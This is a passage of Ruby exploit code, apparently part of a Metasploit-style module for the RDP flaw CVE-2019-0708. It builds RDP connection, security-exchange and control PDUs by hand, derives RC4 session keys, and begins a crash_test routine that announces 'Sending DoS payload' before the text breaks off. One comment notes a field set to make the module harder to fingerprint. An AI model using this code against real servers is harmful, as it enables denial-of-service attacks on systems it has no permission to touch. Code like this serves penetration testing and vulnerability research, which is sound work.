pad1 "\x01" + # streamID: 1 [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2 "\x00" + # compressedType: 0 "\x00\x00" + # compressedLength: 0 data ) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b ## Virtual Channel PDU 2.2.6.1 def rdp_build_virtual_channel_pdu(flags, data) data_len = data.length return( [data_len].pack("L<") + # length [flags].pack("L<") + # flags data ) end def rdp_calculate_rc4_keys(client_random, server_random) ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom). preMasterSecret = client_random[0..23] + server_random[0..23] ## PreMasterHash(I) = SaltedHash(preMasterSecret, I) ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343). masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random) ## MasterHash(I) = SaltedHash(MasterSecret, I) ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A). sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random) ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)). initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random) ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)). initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random) macKey = sessionKeyBlob[0..15] return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob end def rdp_connection_initiation() ## Code to check if RDP is open or not. vprint_status("Verifying RDP protocol...") vprint_status("Attempting to connect using RDP security") rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP)) received = sock.get_once(-1, 5) ## TODO: fix it. if (received and received.include? "\x00\x12\x34\x00") return(true) end return(false) end ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom). def rdp_final_hash(k, client_random_bytes, server_random_bytes) md5 = Digest::MD5.new md5 << k md5 << client_random_bytes md5 << server_random_bytes return([md5.hexdigest].pack("H*")) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94 ## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d" ## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00" ## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923". def rdp_hmac(mac_salt_key, data_content) sha1 = Digest::SHA1.new md5 = Digest::MD5.new pad1 = "\x36" * 40 pad2 = "\x5c" * 48 sha1 << mac_salt_key sha1 << pad1 sha1 << [data_content.length].pack('<L') sha1 << data_content md5 << mac_salt_key md5 << pad2 md5 << [sha1.hexdigest].pack("H*") return([md5.hexdigest].pack("H*")) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c ## Parse Server MCS Connect Response PUD - 2.2.1.4 def rdp_parse_connect_response(pkt) ptr = 0 rdp_pkt = pkt[0x49..pkt.length] while(ptr < rdp_pkt.length) header_type = rdp_pkt[ptr..ptr + 1] header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0] # vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}") if(header_type == "\x02\x0c") # vprint_status("Security header") server_random = rdp_pkt[ptr + 20..ptr + 51] public_exponent = rdp_pkt[ptr + 84..ptr + 87] modulus = rdp_pkt[ptr + 88..ptr + 151] # vprint_status("modulus_old: #{bin_to_hex(modulus)}") rsa_magic = rdp_pkt[ptr + 68..ptr + 71] if(rsa_magic != "RSA1") print_error("Server cert isn't RSA, this scenario isn't supported (yet).") raise RdpCommunicationError end # vprint_status("RSA magic: #{rsa_magic}") bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8 vprint_status("RSA #{bitlen}-bits") modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen] # vprint_status("modulus_new: #{bin_to_hex(modulus)}") end ptr += header_length end # vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}") # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}") # vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}") rsmod = bytes_to_bignum(modulus) rsexp = bytes_to_bignum(public_exponent) rsran = bytes_to_bignum(server_random) vprint_status("MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}") vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}") vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}") return rsmod, rsexp, rsran, server_random, bitlen end def rdp_rc4_crypt(rc4obj, data) rc4obj.encrypt(data) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f ## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom)) def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes) sha1 = Digest::SHA1.new md5 = Digest::MD5.new sha1 << i_bytes sha1 << s_bytes sha1 << client_random_bytes sha1 << server_random_bytes md5 << s_bytes md5 << [sha1.hexdigest].pack("H*") return([md5.hexdigest].pack("H*")) end def rdp_recv() buffer_1 = sock.get_once(4, 5) raise RdpCommunicationError unless buffer_1 # nil due to a timeout buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5) raise RdpCommunicationError unless buffer_2 # nil due to a timeout vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}") return(buffer_1 + buffer_2) end def rdp_send(data) vprint_status("Send data: #{bin_to_hex(data)}") sock.put(data) end def rdp_sendrecv(data) rdp_send(data) return(rdp_recv()) end # ------------------------------------------------------------------------- # ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10 ## Client X.224 Connect Request PDU - 2.2.1.1 def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP) ## Blank username is valid, nil is random. user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?) tpkt_len = user_name.length + 38 x224_len = user_name.length + 33 return( "\x03\x00" + # TPKT Header version 03, reserved 0 [tpkt_len].pack("S>") + # TPKT length: 43 [x224_len].pack("C") + # X.224 LengthIndicator "\xe0" + # X.224 Type: Connect Request "\x00\x00" + # dst reference "\x00\x00" + # src reference "\x00" + # class and options "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash=' user_name + # Identifier "username" "\x0d\x0a" + # cookie terminator "\x01\x00" + # Type: RDP Negotiation Request (0x01) "\x08\x00" + # Length [requested_protocols].pack('L<') # requestedProtocols ) end # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS) ## After negotiating TLS or NLA the connectInitial packet needs to include the ## protocol selection that the server indicated in its negotiation response. ## TODO: If this is pulled into an RDP library then the channel list likely ## needs to be build dynamically. For example, MS_T120 likely should only ## ever be sent as part of checks for CVE-2019-0708. ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE) ## 15 characters + null terminator, converted to unicode ## fixed length - 32 characters total name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le') name_unicode += "\x00" * (32 - name_unicode.length) pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101) "\x82\x01\xb2" + # Length (BER: Length) "\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString) "\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString) "\x01\x01\xff" + # UpwaredFlag: True (BER: boolean) ## Connect-Initial: Target Parameters "\x30\x19" + # TargetParamenters (BER: SequenceOf) ## *** not sure why the BER encoded Integers below have 2 byte values instead of one *** "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" + ## Connect-Intial: Minimum Parameters "\x30\x19" + # MinimumParameters (BER: SequencOf) "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" + ## Connect-Initial: Maximum Parameters "\x30\x1c" + # MaximumParameters (BER: SequencOf) "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" + ## Connect-Initial: UserData "\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString) ## T.124 GCC Connection Data (ConnectData) - PER Encoding used "\x00\x05" + # object length "\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control "\x81\x48" + # Length: ??? (Connect PDU) "\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1 "\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key) "\x81\x3a" + # Length: ??? (T.124 UserData section) ## Client MCS Section - 2.2.1.3 "\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2 "\xea\x00" + # Length: 234 (includes header) "\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1) "\x80\x07" + # desktopWidth: 1920 "\x38\x04" + # desktopHeigth: 1080 "\x01\xca" + # colorDepth: 8 bpp "\x03\xaa" + # SASSequence: 43523 "\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US) "\xee\x42\x00\x00" + # clientBuild: ???? [name_unicode].pack("a*") + # clientName "\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102) "\x00\x00\x00\x00" + # keyboadSubtype: 0 "\x0c\x00\x00\x00" + # keyboardFunctionKey: 12 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes) "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x01\xca" + # postBeta2ColorDepth: 8 bpp "\x01\x00" + # clientProductID: 1 "\x00\x00\x00\x00" + # serialNumber: 0 "\x18\x00" + # highColorDepth: 24 bpp "\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp) "\xaf\x07" + # earlyCapabilityFlags "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes) "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" + "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" + "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" + "\x07" + # connectionType: 7 "\x00" + # pad1octet ## serverSelectedProtocol - After negotiating TLS or CredSSP this value ## must match the selectedProtocol value from the server's Negotiate ## Connection confirm PDU that was sent before encryption was started. [selected_proto].pack('L<') + # "\x01\x00\x00\x00" "\x56\x02\x00\x00" + "\x50\x01\x00\x00" + "\x00\x00" + "\x64\x00\x00\x00" + "\x64\x00\x00\x00" + "\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5 "\x0c\x00" + # Length: 12 (includes header) "\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3) "\x00\x00\x00\x00" + # RedirectedSessionID "\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3 "\x0c\x00" + # Length: 12 (includes header) "\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit) "\x00\x00\x00\x00" + # extEncryptionMethods (French locale only) "\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4 "\x38\x00" + # Length: 56 (includes header) channels_defs ## Fix. for packet modification. ## T.125 Connect-Initial size_1 = [pdu.length - 5].pack("s") # Length (BER: Length) pdu[3] = size_1[1] pdu[4] = size_1[0] ## Connect-Initial: UserData size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString) pdu[100] = size_2[1] pdu[101] = size_2[0] ## T.124 GCC Connection Data (ConnectData) - PER Encoding used size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU) pdu[109] = "\x81" pdu[110] = size_3[0] size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section) pdu[123] = "\x81" pdu[124] = size_4[0] ## Client MCS Section - 2.2.1.3 size_5 = [pdu.length - 383].pack("s") # Length (includes header) pdu[385] = size_5[0] rdp_build_data_tpdu(pdu) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f ## Client Security Exchange PDU - 2.2.1.10 def pdu_security_exchange(rcran, rsexp, rsmod, bitlen) encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod) encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum) bitlen += 8 # Pad with size of TS_SECURITY_PACKET header userdata_length = 8 + bitlen userdata_length_low = userdata_length & 0xFF userdata_length_high = userdata_length / 256 flags = 0x80 | userdata_length_high pdu = "\x64" + # T.125 sendDataRequest "\x00\x08" + # intiator userId "\x03\xeb" + # channelId = 1003 "\x70" + # dataPriority = high, segmentation = begin | end [flags].pack("C") + [userdata_length_low].pack("C") + # UserData length # TS_SECURITY_PACKET - 2.2.1.10.1 "\x01\x00" + # securityHeader flags "\x00\x00" + # securityHeader flagsHi [bitlen].pack("L<") + # TS_ length encrypted_rcran + # encryptedClientRandom - 64 bytes "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present) return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c ## Client MCS Erect Domain Request PDU - 2.2.1.5 def pdu_erect_domain_request() pdu = "\x04" + # T.125 ErectDomainRequest "\x01\x00" + # subHeight - length 1, value 0 "\x01\x00" # subInterval - length 1, value 0 return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\ ## Client MCS Attach User Request PDU - 2.2.1.6 def pdu_attach_user_request() pdu = "\x28" # T.125 AttachUserRequest return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b ## Client MCS Channel Join Request PDU -2.2.1.8 def pdu_channel_request(user1, channel_id) pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d ## TS_INFO_PACKET - 2.2.1.11.1.1 def pdu_client_info(user_name, domain_name = "", ip_address = "") ## Max. len for 4.0/6.0 servers is 44 bytes including terminator. ## Max. len for all other versions is 512 including terminator. ## We're going to limit to 44 (21 chars + null -> unicode) here. ## Blank username is valid, nil = random. user_name = Rex::Text.rand_text_alpha(10) if user_name.nil? user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le') uname_len = user_unicode.length ## Domain can can be, and for rdesktop typically is, empty. ## Max. len for 4.0/5.0 servers is 52 including terminator. ## Max. len for all other versions is 512 including terminator. ## We're going to limit to 52 (25 chars + null -> unicode) here. domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le') domain_len = domain_unicode.length ## This address value is primarily used to reduce the fields by which this ## module can be fingerprinted. It doesn't show up in Windows logs. ## clientAddress + null terminator ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00" ip_len = ip_unicode.length pdu = "\xa1\xa5\x09\x04" + "\x09\x04\xbb\x47" + # CodePage "\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator [uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator "\x00\x00" + # cbPassword (length value) "\x00\x00" + # cbAlternateShell (length value) "\x00\x00" + # cbWorkingDir (length value) [domain_unicode].pack("a*") + # Domain "\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain [user_unicode].pack("a*") + # UserName "\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName "\x00\x00" + # Password - empty "\x00\x00" + # AlternateShell - empty ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1 "\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically [ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons. [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode) "\x3c\x00" + # cbClientDir (length value): 60 "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" + "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" + "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" + ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes ## These are the default values for rdesktop "\xa4\x01\x00\x00" + # Bias ## StandardName - 'GTB,normaltid' "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" + "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" + "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate "\x00\x00\x00\x00" + # StandardBias ## DaylightName - 'GTB,sommartid' "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" + "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" + "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate "\xc4\xff\xff\xff" + # DaylightBias "\x01\x00\x00\x00" + # clientSessionId "\x06\x00\x00\x00" + # performanceFlags "\x00\x00" + # cbAutoReconnectCookie "\x64\x00\x00\x00" return(pdu) end # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48 # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1 def pdu_client_confirm_active() pdu = "\xea\x03\x01\x00" + # shareId: 66538 "\xea\x03" + # originatorId "\x06\x00" + # lengthSourceDescriptor: 6 "\x3e\x02" + # lengthCombinedCapabilities: ??? "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC' "\x17\x00" + # numberCapabilities: 23 "\x00\x00" + # pad2Octets "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET "\x18\x00" + # lengthCapability: 24 "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET "\x1c\x00" + # lengthCapability: 28 "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" + "\x01\x00\x00\x1a\x01\x00\x00\x00" + "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET "\x58\x00" + # lengthCapability: 88 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" + "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" + "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" + "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" + "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" + "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x0a\x00" + # capabilitySetType: 10 - ?? "\x08\x00" + # lengthCapability: 8 "\x06\x00\x00\x00" + "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET "\x0c\x00" + # lengthCapability: 12 "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET "\x0c\x00" + # lengthCapability: 12 "\x00\x00\x00\x00\x02\x00\x02\x00" + "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET "\x0a\x00" + # lengthCapability: 10 "\x01\x00\x14\x00\x15\x00" + "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x00\x00\x00\x00" + "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET "\x58\x00" + # lengthCapability: 88 "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" + "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET "\x34\x00" + # lengthCapability: 52 "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" + "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" + "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" + "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x11\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x01\x00\x00\x00\x00\x28\x64\x00" + "\x14\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x01\x00\x00\x00\x00\x00\x00\x00" + "\x15\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x02\x00\x00\x00\x00\x0a\x00\x01" + "\x1a\x00" + # capabilitySetType: ?? "\x08\x00" + # lengthCapability: 8 "\xaf\x94\x00\x00" + "\x1c\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x12\x00\x00\x00\x00\x00\x00\x00" + "\x1b\x00" + # capabilitySetType: ?? "\x06\x00" + # lengthCapability: 6 "\x01\x00" + "\x1e\x00" + # capabilitySetType: ?? "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x18\x00" + # capabilitySetType: ?? "\x0b\x00" + # lengthCapability: 11 "\x02\x00\x00\x00\x03\x0c\x00" + "\x1d\x00" + # capabilitySetType: ?? "\x5f\x00" + # lengthCapability: 95 "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" + "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" + "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" + "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" + "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" + "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04" ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU return(rdp_build_share_control_header(0x13, pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992 ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1 def pdu_client_synchronize(target_user = 0) pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC [target_user].pack("S<") # targetUser, 16 bit, unsigned. ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE data_header = rdp_build_share_data_header(0x1f, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135 ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15 def pdu_client_control_cooperate() pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE "\x00\x00" + # grantId: 0 "\x00\x00\x00\x00" # controlId: 0 ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL data_header = rdp_build_share_data_header(0x14, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35 ## Control Request - TC_CONTROL_PDU 2.2.1.16 def pdu_client_control_request() pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL "\x00\x00" + # grantId: 0 "\x00\x00\x00\x00" # controlId: 0 ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL data_header = rdp_build_share_data_header(0x14, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396 ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1 def pdu_client_input_event_sychronize() pdu = "\x01\x00" + # numEvents: 1 "\x00\x00" + # pad2Octets "\x00\x00\x00\x00" + # eventTime "\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5 "\x00\x00" + # pad2Octets "\x00\x00\x00\x00" # toggleFlags ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT data_header = rdp_build_share_data_header(0x1c, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9 ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18 def pdu_client_font_list() pdu = "\x00\x00" + # numberFonts: 0 "\x00\x00" + # totalNumberFonts: 0 "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST) "\x32\x00" # entrySize: 50 ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST data_header = rdp_build_share_data_header(0x27, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end # ------------------------------------------------------------------------- # def crash_test(rc4enckey, hmackey) begin received = "" for i in 0..5 received += rdp_recv() end rescue RdpCommunicationError # we don't care end vprint_status("Sending DoS payload") found = false for j in 0..15 ## x86_payload: 